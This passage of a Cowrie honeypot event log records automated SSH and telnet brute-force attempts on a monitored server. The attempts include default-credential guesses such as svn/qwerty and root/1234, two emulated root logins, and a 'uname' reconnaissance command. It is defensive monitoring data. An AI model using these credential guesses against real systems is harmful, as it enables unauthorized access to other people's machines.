fie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:07:30.164217Z","src_ip":"212.227.125.160","session":"03bab5147156"}
{"eventid":"cowrie.login.failed","username":"svn","password":"123456789","message":"login attempt [svn/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T13:07:30.690263Z","src_ip":"212.227.125.160","session":"03bab5147156"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:07:31.866300Z","src_ip":"212.227.125.160","session":"03bab5147156"}
{"eventid":"cowrie.session.closed","duration":30.560325860977173,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:07:39.313836Z","src_ip":"212.227.235.229","session":"d9f7d89783b9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53114,"dst_ip":"1.2.3.4","dst_port":23,"session":"8f64463db617","protocol":"telnet","message":"New connection: 212.227.235.229:53114 (1.2.3.4:23) [session: 8f64463db617]","sensor":"my-vps","timestamp":"2025-08-28T13:07:40.562713Z"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:07:40.746979Z","src_ip":"212.227.235.229","session":"8f64463db617"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:07:41.183529Z","src_ip":"212.227.235.229","session":"8f64463db617"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-28T13:07:41.184659Z","src_ip":"212.227.235.229","session":"8f64463db617"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-28T13:07:41.185443Z","src_ip":"212.227.235.229","session":"8f64463db617"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51056,"dst_ip":"1.2.3.4","dst_port":22,"session":"13dac69ef65b","protocol":"ssh","message":"New connection: 212.227.235.229:51056 (1.2.3.4:22) [session: 13dac69ef65b]","sensor":"my-vps","timestamp":"2025-08-28T13:08:03.654200Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:08:03.655148Z","src_ip":"212.227.235.229","session":"13dac69ef65b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43220,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fae7b9faf83","protocol":"ssh","message":"New connection: 212.227.125.160:43220 (1.2.3.4:22) [session: 6fae7b9faf83]","sensor":"my-vps","timestamp":"2025-08-28T13:08:03.682864Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:08:03.683409Z","src_ip":"212.227.125.160","session":"6fae7b9faf83"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:08:03.859878Z","src_ip":"212.227.125.160","session":"6fae7b9faf83"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T13:08:03.919010Z","src_ip":"212.227.235.229","session":"13dac69ef65b"}
{"eventid":"cowrie.login.failed","username":"svn","password":"12345","message":"login attempt [svn/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T13:08:04.402328Z","src_ip":"212.227.125.160","session":"6fae7b9faf83"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:08:05.581480Z","src_ip":"212.227.125.160","session":"6fae7b9faf83"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:08:11.654547Z","src_ip":"212.227.235.229","session":"13dac69ef65b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60476,"dst_ip":"1.2.3.4","dst_port":22,"session":"4486d4d844da","protocol":"ssh","message":"New connection: 212.227.125.160:60476 (1.2.3.4:22) [session: 4486d4d844da]","sensor":"my-vps","timestamp":"2025-08-28T13:08:38.122771Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:08:38.130015Z","src_ip":"212.227.125.160","session":"4486d4d844da"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:08:38.295860Z","src_ip":"212.227.125.160","session":"4486d4d844da"}
{"eventid":"cowrie.login.failed","username":"svn","password":"12345678","message":"login attempt [svn/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T13:08:38.978797Z","src_ip":"212.227.125.160","session":"4486d4d844da"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:08:40.151898Z","src_ip":"212.227.125.160","session":"4486d4d844da"}
{"eventid":"cowrie.session.connect","src_ip":"45.142.193.27","src_port":40612,"dst_ip":"1.2.3.4","dst_port":23,"session":"88515d507c76","protocol":"telnet","message":"New connection: 45.142.193.27:40612 (1.2.3.4:23) [session: 88515d507c76]","sensor":"my-vps","timestamp":"2025-08-28T13:08:51.185192Z"}
{"eventid":"cowrie.session.closed","duration":7.991831541061401,"message":"Connection lost after 7 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:08:59.176952Z","src_ip":"45.142.193.27","session":"88515d507c76"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34286,"dst_ip":"1.2.3.4","dst_port":23,"session":"9bb01b21cb7a","protocol":"telnet","message":"New connection: 212.227.235.229:34286 (1.2.3.4:23) [session: 9bb01b21cb7a]","sensor":"my-vps","timestamp":"2025-08-28T13:09:03.933819Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40610,"dst_ip":"1.2.3.4","dst_port":22,"session":"673df663b515","protocol":"ssh","message":"New connection: 212.227.125.160:40610 (1.2.3.4:22) [session: 673df663b515]","sensor":"my-vps","timestamp":"2025-08-28T13:09:11.136909Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:09:11.137704Z","src_ip":"212.227.125.160","session":"673df663b515"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:09:11.312677Z","src_ip":"212.227.125.160","session":"673df663b515"}
{"eventid":"cowrie.login.failed","username":"svn","password":"qwerty","message":"login attempt [svn/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T13:09:11.841947Z","src_ip":"212.227.125.160","session":"673df663b515"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:09:13.020474Z","src_ip":"212.227.125.160","session":"673df663b515"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53296,"dst_ip":"1.2.3.4","dst_port":23,"session":"bf6478071ad8","protocol":"telnet","message":"New connection: 212.227.235.229:53296 (1.2.3.4:23) [session: bf6478071ad8]","sensor":"my-vps","timestamp":"2025-08-28T13:09:25.743309Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51604,"dst_ip":"1.2.3.4","dst_port":23,"session":"a3a7def00f1e","protocol":"telnet","message":"New connection: 212.227.235.229:51604 (1.2.3.4:23) [session: a3a7def00f1e]","sensor":"my-vps","timestamp":"2025-08-28T13:09:31.785163Z"}
{"eventid":"cowrie.session.closed","duration":31.26330327987671,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:09:35.197060Z","src_ip":"212.227.235.229","session":"9bb01b21cb7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32842,"dst_ip":"1.2.3.4","dst_port":22,"session":"af4c8562930e","protocol":"ssh","message":"New connection: 212.227.235.229:32842 (1.2.3.4:22) [session: af4c8562930e]","sensor":"my-vps","timestamp":"2025-08-28T13:09:41.370798Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:09:41.371674Z","src_ip":"212.227.235.229","session":"af4c8562930e"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T13:09:41.579171Z","src_ip":"212.227.235.229","session":"af4c8562930e"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-28T13:09:42.206117Z","src_ip":"212.227.235.229","session":"af4c8562930e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T13:09:42.638258Z","src_ip":"212.227.235.229","session":"af4c8562930e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T13:09:42.639090Z","src_ip":"212.227.235.229","session":"af4c8562930e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:09:42.847644Z","src_ip":"212.227.235.229","session":"af4c8562930e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:09:42.849040Z","src_ip":"212.227.235.229","session":"af4c8562930e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55312,"dst_ip":"1.2.3.4","dst_port":22,"session":"d10bd539d4c8","protocol":"ssh","message":"New connection: 212.227.125.160:55312 (1.2.3.4:22) [session: d10bd539d4c8]","sensor":"my-vps","timestamp":"2025-08-28T13:09:49.382441Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:09:49.383369Z","src_ip":"212.227.125.160","session":"d10bd539d4c8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:09:49.564710Z","src_ip":"212.227.125.160","session":"d10bd539d4c8"}
{"eventid":"cowrie.login.failed","username":"svn","password":"123123","message":"login attempt [svn/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T13:09:50.272722Z","src_ip":"212.227.125.160","session":"d10bd539d4c8"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:09:51.456452Z","src_ip":"212.227.125.160","session":"d10bd539d4c8"}
{"eventid":"cowrie.session.closed","duration":31.710207223892212,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:09:57.453412Z","src_ip":"212.227.235.229","session":"bf6478071ad8"}
{"eventid":"cowrie.session.closed","duration":30.430222988128662,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:10:02.215268Z","src_ip":"212.227.235.229","session":"a3a7def00f1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42266,"dst_ip":"1.2.3.4","dst_port":23,"session":"7f6b42e71321","protocol":"telnet","message":"New connection: 212.227.125.160:42266 (1.2.3.4:23) [session: 7f6b42e71321]","sensor":"my-vps","timestamp":"2025-08-28T13:10:10.439799Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50918,"dst_ip":"1.2.3.4","dst_port":22,"session":"12457a159a02","protocol":"ssh","message":"New connection: 212.227.125.160:50918 (1.2.3.4:22) [session: 12457a159a02]","sensor":"my-vps","timestamp":"2025-08-28T13:10:25.146271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T13:10:25.153378Z","src_ip":"212.227.125.160","session":"12457a159a02"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T13:10:25.318245Z","src_ip":"212.227.125.160","session":"12457a159a02"}
{"eventid":"cowrie.login.failed","username":"svn","password":"111111","message":"login attempt [svn/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T13:10:26.005039Z","src_ip":"212.227.125.160","session":"12457a159a02"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:10:27.179285Z","src_ip":"212.227.125.160","session":"12457a159a02"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:10:41.191060Z","src_ip":"212.227.235.229","session":"8f64463db617"}
{"eventid":"cowrie.session.closed","duration":180.633864402771,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:10:41.196481Z","src_ip":"212.227.235.229","session":"8f64463db617"}
{"eventid":"cowrie.session.closed","duration":31.58192205429077,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T13:10:42.021649Z","src_ip":"212.227.125.160","session":"7f6b42e71321"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54698,"dst_ip":"1.2.3.4","dst_port":22,"session":"af863dcbe4b7","protocol":"ssh","message":"New connection: 212.227.235.229:54698 (1.2.3.4:22) [session: af863dcbe4b7]","sensor":"my-vps","timestamp":"2025-08-28T13:10:49.691735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T13:10:49.692707Z","src_ip":"212.227.235.229","session":"af863dcbe4b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com",